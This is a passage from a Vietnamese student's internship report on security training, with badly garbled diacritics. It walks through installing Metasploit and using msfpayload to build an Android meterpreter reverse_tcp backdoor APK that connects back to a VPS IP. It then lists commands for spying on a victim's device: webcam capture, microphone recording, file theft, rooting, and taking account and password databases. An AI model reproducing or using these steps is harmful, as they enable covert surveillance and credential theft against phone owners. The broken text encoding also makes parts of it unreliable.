Đ c c u hình và cài đ t h th ng Firewall và DDOS Protection.ượ ấ ặ ệ ố
B ph n kỹ thu t k p th i can thi p nhanh chóng n u có s c phát sinh.ộ ậ ậ ị ờ ệ ế ự ố
2.2.2 Cài đ t mã đ c trên VPS:ặ ộ
Gi i thi u ớ ệ
Metasploit là m t công c khai thác l h ng c a các h đi u hành, dùngộ ụ ỗ ổ ủ ệ ề đ ki m tra, t n công và khai thác l i c a các service. Metasploit đ c xâyể ể ấ ỗ ủ ượ d ng t ngôn ng h ng đ i t ng Perl, v i nh ng components đ c vi tự ừ ữ ướ ố ượ ớ ữ ượ ế b ng C, assembler, và Python. Metasploit có th ch y trên h u h t các h đi uằ ể ạ ầ ế ệ ề hành: Linux, Windows, Mac OS.
Cài đ t ặ
T i gói cài đ t c a Metasploit, đây ta có 2 phiên b n là Pro vàả ặ ủ ở ả
Community. Ta ch n phiên b n Community mi n phí và dùng cho nghiên c u. ọ ả ễ ứ
SVTH: Lê Công H u 51101058ậ
Trang 50
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Sau khi t i v gói cài đ t c a Metasploit Community ta cài đ t nh nh ngả ề ặ ủ ặ ư ữ ph n m m khác. ầ ề
SVTH: Lê Công H u 51101058ậ
Trang 51
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ch n folder cài đ t: ọ ặ
C ng c a d ch v Metasploit sẽ s d ng, m c đ nh là 3790: ổ ủ ị ụ ử ụ ặ ị
SVTH: Lê Công H u 51101058ậ
Trang 52
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ch n server và ngày h t h n, đ m c đ nh: ọ ế ạ ể ặ ị
Quá trình cài đ t c a Metasploit: ặ ủ
SVTH: Lê Công H u 51101058ậ
Trang 53
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Ti n trình hoàn t t, ch n Finish và truy c p đ n giao di n web c a ế ấ ọ ậ ế ệ ủch ng trình: ươ
Sau khi Finish trình duy t web m lên và đi t i giao di nệ ở ớ ệ
SVTH: Lê Công H u 51101058ậ
Trang 54
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Click vào link: https://localhost:3790/ sẽ d n đ n trang t o tài kho n đ ẫ ế ạ ả ểlogin vào Metasploit. Đi n Username, Password s d ng và m t s thông tin b xung, ề ử ụ ộ ố ổr i ch n Create Account: ồ ọ
Trình duy t chuy n đ n trang nh p key đ active ch ng trình, key này ệ ể ế ậ ể ươđ c g i mi n phí đ n mail khi t i ph n m m. Sau khi đi n key nh n ượ ử ễ ế ả ầ ề ề ấActivate License:
SVTH: Lê Công H u 51101058ậ
Trang 55
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
Giao di n ch ng trình Metasploit Console ệ ươ
SVTH: Lê Công H u 51101058ậ
Trang 56
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
2.2.3 T VPS xâm nh p vào thi t b Android:ừ ậ ế ị
Các b c th c hi nướ ự ệ
1. S d ng Kali Linux đ t o file APK làm backdoor đ hack vàoử ụ ể ạ ể
Android nh trên mang LAN v i đ a ch IP là đ a ch c a VPS ư ớ ị ỉ ị ỉ ủ
Chúng ta v n s d ng l nh ẫ ử ụ ệ
msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132
lport=4444 R > /root/Desktop/files.apk
đây đ a ch VPS là 14.0.21.132Ở ị ỉ
2. Kh i đ ng Metasploit Console trên VPSở ộ
3. Chúng ta th c hi n các b c xâm nh p nh đã đ c p ph n trên,ự ệ ướ ậ ư ề ậ ở ầ
đây ch khác là s d ng chính IP c a VPSở ỉ ử ụ ủ
SVTH: Lê Công H u 51101058ậ
Trang 57
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
4. Sau khi máy n n nhân t i v file apk đã đ c t o ra, máy androidạ ả ề ượ ạ đó sẽ b hackị
SVTH: Lê Công H u 51101058ậ
Trang 58
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
5. S d ng l nh Help đ xem các l nh đ c metasploit h trử ụ ệ ể ệ ượ ỗ ợ
Đ xem thông tin v máy, nh p l nh ể ề ậ ệ sysinfoĐ xem các tác v đang ch y gõ ể ụ ạ psXem ip gõ ifconfigXem danh sách th m c, file gõ ư ụ ls
S d ng camera:ử ụĐ xem danh sách camera, nh p ể ậ webcam_listĐ ch p hình b ng camera, nh p ể ụ ằ ậ webcam_snap x v i x là id c a camera ớ ủ
xem danh sách camera ph n tr c. ở ở ầ ướ
Ghi âmĐ th c hi n ghi âm, nh p lênh ể ự ệ ậ record_mic và file ghi âm sẽ đ c l u vượ ư ề
máy
SVTH: Lê Công H u 51101058ậ
Trang 59
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
L y file t sd cardấ ừĐ vào sdcard, nh p l nh: cd /sdcard và l nh ls đ xem danh sách file, ể ậ ệ ệ ể
th m cư ụDùng l nh cd /sdcard/Download đ vào th m cệ ể ư ụ
Đ t i v máy, ta nh p l nhể ả ề ậ ệDownload App.apk
Đ upload gõ l nh ể ệ uploadVà file này sẽ đ c t i v th m c root c a máy Kaliượ ả ề ư ụ ủ
Gõ shell đ vào l nhể ệki m tra xem có root ch a gõể ưsuwhoamiN u báo unknown id is 0 t c là đã rootế ứls -l danh m c file và các quy nụ ềcd đ chuy n h ng th m cể ể ướ ư ụĐ ăn c p tài kho n, m t kh u, file apk và thay đ i các quy n ể ắ ả ậ ẩ ổ ề/DATA/DATA/APP/DATA/SYSTEM/DATA/SYSTEM/accounts.db/DATA/SYSTEM/SYNC/accounts.xml/SYSTEM/APP/đ xem danh sách và down load các file hay thay đ i các file trong ROMể ổđ u tiên ph i gõ l nh SU đ có toàn quy n truy c pầ ả ệ ể ề ậđ có đ ng d n đ y đ dùng l nh chmod -R 777 path to filenameể ườ ẫ ầ ủ ệVí d chmod -R 777 /dataụCtrl + C đ quay l iể ạS d ng SQLite đ m file dbử ụ ể ở
SVTH: Lê Công H u 51101058ậ
Trang 60
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
3 K T QU Đ T Đ CẾ Ả Ạ ƯỢ
Nh ng ki n th c lý thuy t đã đ c c ng c :ữ ế ứ ế ượ ủ ố
Tìm hi u v l ch s , quá trình phát tri n c a h đi u hành ể ề ị ử ể ủ ệ ềAndroid
Tìm hi u v h đi u hành Kali Linuxể ề ệ ề Tìm hi u v các l h ng b o m t c a Windows và Androidể ề ỗ ổ ả ậ ủ Tìm hi u v cách s a đ i file APK và th c hi n Signing ng d ngể ề ử ổ ự ệ ứ ụ
Nh ng kỹ năng th c hành đã đ c h c thêm:ữ ự ượ ọ
Th c hi n cài đ t Android trên máy oự ệ ặ ả Cài đ t Kali Linux, s d ng nó đ hack vào các l h ng b o m t ặ ử ụ ể ỗ ổ ả ậ
c a Windows và Androidủ Thi l y ch ng ch System Hacking c a trung tâm Athenaấ ứ ỉ ủ Th c hi n s a đ i, t o ra các file Trojan, Backdoor sau đó cài đ t ự ệ ử ổ ạ ặ
vào Android Bi t thêm v m t s bài h c trong l p Hacker mũ tr ngế ề ộ ố ọ ớ ắ
Nh ng kinh nghi m th c ti n đã tích lũy đ c:ữ ệ ự ễ ượ
Qua g n 2 tháng th c t p, b n thân em đã đúc k t đ c nhi u kinh ầ ự ậ ả ế ượ ềnghi m quý báu, th nh t đó là các kĩ năng v chuyên môn, em đã đ c h c ệ ứ ấ ề ượ ọvà cũng c các ki n th c m i bên c nh các ki n th c n n t ng. H n đó n a là ố ế ứ ớ ạ ế ứ ề ả ơ ữquá trình th c t p trong môi tr ng doanh nghi p đã cho em làm quen d n ự ậ ườ ệ ầđ không b ng trong quá trình đi làm sau này, thông qua các kĩ năng giao ể ỡ ỡti p và ng x . ế ứ ử
SVTH: Lê Công H u 51101058ậ
Trang 61
Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng
4 K T LU N QUÁ TRÌNH TH C T PẾ Ậ Ự Ậ
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
....................................................................................................................................
SVTH: Lê Công H u 51101058ậ
Trang 62
Recommended